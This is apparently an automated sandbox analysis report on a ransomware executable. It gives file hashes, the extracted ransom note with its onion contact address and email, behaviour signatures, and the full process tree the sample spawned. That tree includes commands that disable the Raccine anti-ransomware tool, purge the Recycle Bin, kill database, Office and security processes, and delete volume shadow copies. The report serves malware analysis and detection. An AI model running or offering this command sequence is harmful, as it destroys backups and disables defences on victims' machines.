Analysis
-
max time kernel
74s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-06-2022 17:41
General
-
Target
sample.exe
-
Size
94KB
-
MD5
26f65722f6307386f3aa23237f44c24a
-
SHA1
d26becc64f43c7af17f2d39d3fc1b744ac3e8fbb
-
SHA256
cce5a753888cb5b044c767fe8e95e410ebdf1e1c79cabc95db1c9e1a8e81c5e7
-
SHA512
241c6ba3e95206827fe26ee6ef279e0bad2fbe6d4b55732fdacd078e2a977726a01bc16fd4b213b7483a1f1e74d1355dc416fb04ad8d86e3da2443cfa499bbb1
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RECOVERY.txt
Ransom Note
All your important files are encrypted!
Any attempts to recover your files using
third-party software will have fatal consequences, the files will be changed forever,
without the possibility of recovery.
There is only one way to get your files back: install the tor browser (https://www.torproject.org/download )
Important: Create a new email in the service http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create for contact!
write to me at Retailgaze@onionmail.org
Send me your ID by email
Key Identifier:
SMODk6hMz5lk5zn8XQHTiQpkmWuc84m7seTi63tYw9WhR9jrjTN5ynODxNmzD+uMyxgFYLxyn9OWtkId5ypPEEeDlGNsy1NgTqxeng0ryTX60kH2EjSWUTLRUHOh9oH6d6OIKCUpbzQCtSMMXXL05PGAXCKSUFo/fDetmCt5Hqul9dh4eiwyC/KKh/cdG0LM7ofj16uMVweBSLkBenGCh918MC1itrbDiW8Yhf1+Ljgvu5+1TX4N36Aw0g8o9/mf7yyqxGvZkcJlSrkEGOdknH0EQUd1hLJi10XGpOUUgBBoYrOsxasjVnGPqr+L1j2PyD8txaaqd6Kpxr5DZ4b8id9bdYcbIUlW+fOY6Xtid314BC3lJEszqVQsBk4Ac9TxQu6Wh9XZ1SPq/DjMpJYwuWSgb1g5Wzg6DSZdlSGqYI61JHhx8fucrLASZp2RnFOADAMp/fwnVVkLLHOA6aU9yEZjnyevyWlHYqc0aCDEY17H5ygrF+ySudnTTMgmyX+1aIFXoTbxCTRkD6tRowPixiA3wR2VRJEI6NutVOCqC7vGRIaQofFK00L2RQk55nrTsIiQn3P/47h6jinfKb22XX8mqrs3fNh4rx8Jq4XaI3hpcUUm8msCPD6OepiTsFwBXQtA5oamvOamwztAgML+D6LfR53TUjcYTCYqS71nFOo=
Emails
Retailgaze@onionmail.org
URLs
http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create
Signatures
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in Windows directory 21 IoCs
-
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/60-149-0x0000000000000000-mapping.dmp
-
memory/392-180-0x0000000000000000-mapping.dmp
-
memory/524-131-0x00000000049E0000-0x0000000004A46000-memory.dmpFilesize
408KB
-
memory/524-130-0x0000000000090000-0x00000000000AE000-memory.dmpFilesize
120KB
-
memory/540-176-0x0000000000000000-mapping.dmp
-
memory/628-162-0x0000000000000000-mapping.dmp
-
memory/716-143-0x0000000000000000-mapping.dmp
-
memory/896-158-0x0000000000000000-mapping.dmp
-
memory/972-148-0x0000000000000000-mapping.dmp
-
memory/1124-132-0x0000000000000000-mapping.dmp
-
memory/1140-175-0x0000000000000000-mapping.dmp
-
memory/1272-173-0x0000000000000000-mapping.dmp
-
memory/1484-187-0x0000000000000000-mapping.dmp
-
memory/1568-177-0x0000000000000000-mapping.dmp
-
memory/1708-136-0x0000000000000000-mapping.dmp
-
memory/1724-134-0x0000000000000000-mapping.dmp
-
memory/1764-153-0x0000000000000000-mapping.dmp
-
memory/1928-137-0x0000000000000000-mapping.dmp
-
memory/1984-186-0x0000000000000000-mapping.dmp
-
memory/2028-166-0x0000000000000000-mapping.dmp
-
memory/2076-174-0x0000000000000000-mapping.dmp
-
memory/2196-146-0x0000000000000000-mapping.dmp
-
memory/2236-152-0x0000000000000000-mapping.dmp
-
memory/2360-172-0x0000000000000000-mapping.dmp
-
memory/2376-190-0x0000000000000000-mapping.dmp
-
memory/2472-169-0x0000000000000000-mapping.dmp
-
memory/2476-178-0x0000000000000000-mapping.dmp
-
memory/2696-150-0x0000000000000000-mapping.dmp
-
memory/2780-171-0x0000000000000000-mapping.dmp
-
memory/2784-141-0x0000000000000000-mapping.dmp
-
memory/2876-164-0x0000000000000000-mapping.dmp
-
memory/3052-181-0x0000000000000000-mapping.dmp
-
memory/3084-160-0x0000000000000000-mapping.dmp
-
memory/3192-192-0x0000000000000000-mapping.dmp
-
memory/3192-197-0x0000000006730000-0x000000000674E000-memory.dmpFilesize
120KB
-
memory/3192-196-0x0000000006070000-0x00000000060D6000-memory.dmpFilesize
408KB
-
memory/3192-195-0x0000000005770000-0x0000000005792000-memory.dmpFilesize
136KB
-
memory/3192-194-0x00000000059D0000-0x0000000005FF8000-memory.dmpFilesize
6.2MB
-
memory/3192-193-0x0000000002E10000-0x0000000002E46000-memory.dmpFilesize
216KB
-
memory/3196-154-0x0000000000000000-mapping.dmp
-
memory/3448-168-0x0000000000000000-mapping.dmp
-
memory/3580-183-0x0000000000000000-mapping.dmp
-
memory/3628-155-0x0000000000000000-mapping.dmp
-
memory/3644-133-0x0000000000000000-mapping.dmp
-
memory/3740-138-0x0000000000000000-mapping.dmp
-
memory/3796-191-0x0000000000000000-mapping.dmp
-
memory/3804-140-0x0000000000000000-mapping.dmp
-
memory/4020-188-0x0000000000000000-mapping.dmp
-
memory/4028-159-0x0000000000000000-mapping.dmp
-
memory/4100-156-0x0000000000000000-mapping.dmp
-
memory/4144-161-0x0000000000000000-mapping.dmp
-
memory/4200-151-0x0000000000000000-mapping.dmp
-
memory/4280-145-0x0000000000000000-mapping.dmp
-
memory/4292-189-0x0000000000000000-mapping.dmp
-
memory/4320-179-0x0000000000000000-mapping.dmp
-
memory/4352-147-0x0000000000000000-mapping.dmp
-
memory/4408-170-0x0000000000000000-mapping.dmp
-
memory/4500-135-0x0000000000000000-mapping.dmp
-
memory/4692-142-0x0000000000000000-mapping.dmp
-
memory/4752-144-0x0000000000000000-mapping.dmp
-
memory/4756-157-0x0000000000000000-mapping.dmp
-
memory/4788-163-0x0000000000000000-mapping.dmp
-
memory/4904-139-0x0000000000000000-mapping.dmp
-
memory/4972-185-0x0000000000000000-mapping.dmp
-
memory/5000-182-0x0000000000000000-mapping.dmp
-
memory/5012-165-0x0000000000000000-mapping.dmp
-
memory/5032-184-0x0000000000000000-mapping.dmp
-
memory/5044-167-0x0000000000000000-mapping.dmp